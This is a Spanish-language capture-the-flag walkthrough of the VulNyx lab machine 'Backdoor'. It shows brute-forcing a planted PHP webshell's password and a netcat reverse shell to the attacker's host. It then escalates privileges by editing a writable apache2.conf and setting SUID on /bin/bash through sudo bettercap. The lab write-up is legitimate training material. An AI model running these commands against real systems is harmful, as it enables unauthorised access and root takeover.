🔴 NYX - Backdoor
#vulnyx #nyx #linux #apache2.conf (writable) #bettercap (sudo)
Diciembre 29, 2024 by Miguel R. (d4t4s3c)
Information
Backdoor es una máquina Linux de la plataforma VulNyx, tiene un nivel de dificultad difícil y fue creada por el usuario d4t4s3c.
- Acceso inicial: La máquina simula ser un sistema comprometido y los ciberdelincuentes han creado persistencia en el, se descubre una webshell PHP instalada en el servidor permitiendo obtener una shell.
- Escalada de privilegios: El usuario dispone de permisos sudo sobre un binario que permitirá escapar a una shell como root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 17:29 CET
Nmap scan report for 192.168.1.88
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 17:30 CET
Nmap scan report for 192.168.1.88
Host is up (0.00087s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
Shell (www-data)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.88/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.88/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
/Backdoor (Status: 301) [Size: 315] [--> http://192.168.1.88/Backdoor/]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
En la ruta /Backdoor no tengo capacidad de directory listing y da un código 403 (Forbbiden)
Al llamarse Backdoor la ruta, uso un wordlist de SecLists especifico de para ello
❯ gobuster dir -w /opt/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.1.88/Backdoor
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.88/Backdoor
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/php-backdoor.php (Status: 200) [Size: 1432]
Progress: 422 / 423 (99.76%)
===============================================================
Finished
===============================================================
En php-backdoor.php encuentro una webshell que parece estar protegida
Password Brute Force
Al no disponer de un nombre de usuario, doy por hecho que solo existe un parámetro llamado password o similar en la webshell
❯ wfuzz -c -w /opt/techyou.txt -d 'password=FUZZ&cmd=id' -u "http://192.168.1.88/Backdoor/php-backdoor.php" --hh=1432 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.88/Backdoor/php-backdoor.php
Total requests: 10000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004806: 200 64 L 124 W 1486 Ch "newpassword"
Total time: 6.162413
Processed Requests: 10000
Filtered Requests: 9999
Requests/sec.: 1622.740
Obtengo el password newpassword y consigo ejecutar comandos como usuario www-data
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=id" |tail -n1
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reverse Shell
Ya ejecutando comandos intento obtener una reverse shell
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=nc 192.168.1.10 443 -e /bin/sh"
Obtengo la shell como usuario www-data
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.88] 45766
id ; hotname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Shell (rootkit)
El usuario www-data puede ejecutar como root el binario reboot con sudo
(Esto solo nos permite reiniciar el sistema)
www-data@backdoor:/$ sudo -l
Matching Defaults entries for www-data on backdoor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on backdoor:
(root) NOPASSWD: /usr/sbin/reboot
Detecto que el usuario www-data dispone de permisos para escribir sobre el archivo /etc/apache2/apache2.conf
www-data@backdoor:/$ find / -writable -type f 2>/dev/null |grep -vE "proc|sys|var"
/etc/apache2/apache2.conf
Teniendo en cuenta los permisos sobre el archivo /etc/apache2/apache2.conf, se puede cambiar el usuario en Apache2 de www-data a rootkit y posteriormente reiniciar el sistema con sudo reboot aplicando los cambios
www-data@backdoor:/$ echo -en 'User rootkit\nGroup rootkit' >> /etc/apache2/apache2.conf
www-data@backdoor:/$ tail -n2 /etc/apache2/apache2.conf ;echo
User rootkit
Group rootkit
www-data@backdoor:/$ sudo -u root /usr/sbin/reboot
Tras reiniciar el sistema obtengo una shell como usuario rootkit
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=nc 192.168.1.10 443 -e /bin/sh"
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.88] 55786
id ; hostname
uid=1000(rootkit) gid=1000(rootkit) groups=1000(rootkit)
backdoor
Privilege Escalation
El usuario rootkit puede ejecutar como root el binario bettercap con sudo
rootkit@backdoor:/$ sudo -l
Matching Defaults entries for rootkit on backdoor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User rootkit may run the following commands on backdoor:
(root) NOPASSWD: /usr/bin/bettercap
Revisando el menú de ayuda de bettercap, dice que con ! se puede Execute a shell command and print its output
rootkit@backdoor:/$ sudo -u root /usr/bin/bettercap
bettercap v2.32.0 (built for linux amd64 with go1.15.15) [type 'help' for a list of commands]
192.168.1.0/24 > 192.168.1.88 » [18:14:33] [sys.log] [war] Could not find mac for
192.168.1.0/24 > 192.168.1.88 » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Le asigno permisos SUID/4755 a la /bin/bash
rootkit@backdoor:/$ sudo -u root /usr/bin/bettercap
192.168.1.0/24 > 192.168.1.88 » !ls -l /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
192.168.1.0/24 > 192.168.1.88 » !chmod 4755 /bin/bash
192.168.1.0/24 > 192.168.1.88 » !ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
192.168.1.0/24 > 192.168.1.88 » exit
Me convierto en usuario root
rootkit@backdoor:/$ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(rootkit) gid=1000(rootkit) euid=0(root) groups=1000(rootkit)
backdoor
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
bash-5.1# find / -name user.txt -o -name root.txt |xargs cat
d9e69***************************
40390***************************
Hasta aquí la resolución de la máquina Backdoor.
Happy Hacking!
© d4t4s3c 2023-2025